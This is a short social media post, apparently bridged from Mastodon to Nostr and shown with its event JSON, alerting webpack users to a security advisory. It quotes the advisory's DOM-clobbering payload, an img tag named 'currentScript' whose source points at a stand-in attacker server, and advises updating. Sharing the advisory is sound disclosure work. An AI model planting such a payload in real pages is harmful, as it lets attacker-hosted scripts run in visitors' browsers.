Webpack has a new security advisory: https://github.com/advisories/GHSA-4vvj-4cpr-p986
> The attacker only needs to insert an iimgtag with the name attribute set to currentScript.
>
> […]
>
> <img name="currentScript" src="https://attacker.controlled.server/"></img>;
If you use webpack and your site allows users to enter any HTML at all, you might wanna look at updating.
Tek is not a convicted felon /
npub13e…clhjj
2024-08-28 16:40:52
Author Public Key
npub13e30hnrpg768tslwwjveafaazctk7ghf9va2se2k4ygr8cj24veshclhjjPublished at
2024-08-28 16:40:52Event JSON
{
"id": "c90f7fe4164b39e88707ddfb05e815ec9871ab1987a7ab39009bb7b6d793fe98",
"pubkey": "8e62fbcc6147b475c3ee74999ea7bd16176f22e92b3aa86556a91033e24aab33",
"created_at": 1724863252,
"kind": 1,
"tags": [
[
"proxy",
"https://freeradical.zone/users/tek/statuses/113040638094614650",
"activitypub"
]
],
"content": "Webpack has a new security advisory: https://github.com/advisories/GHSA-4vvj-4cpr-p986\n\n\u003e The attacker only needs to insert an iimgtag with the name attribute set to currentScript.\n\u003e\n\u003e […]\n\u003e\n\u003e \u003cimg name=\"currentScript\" src=\"https://attacker.controlled.server/\"\u003e\u003c/img\u003e\n\nIf you use webpack and your site allows users to enter any HTML at all, you might wanna look at updating.",
"sig": "8bb1eb05f95e585fc86e7ed13b2e31e1fee9ccc40a0048806bc787054e33f50882a1a572cddfb189746b80fe107fdcb9b83efe5ddbc83d98d9adee4152ecc2d7"
}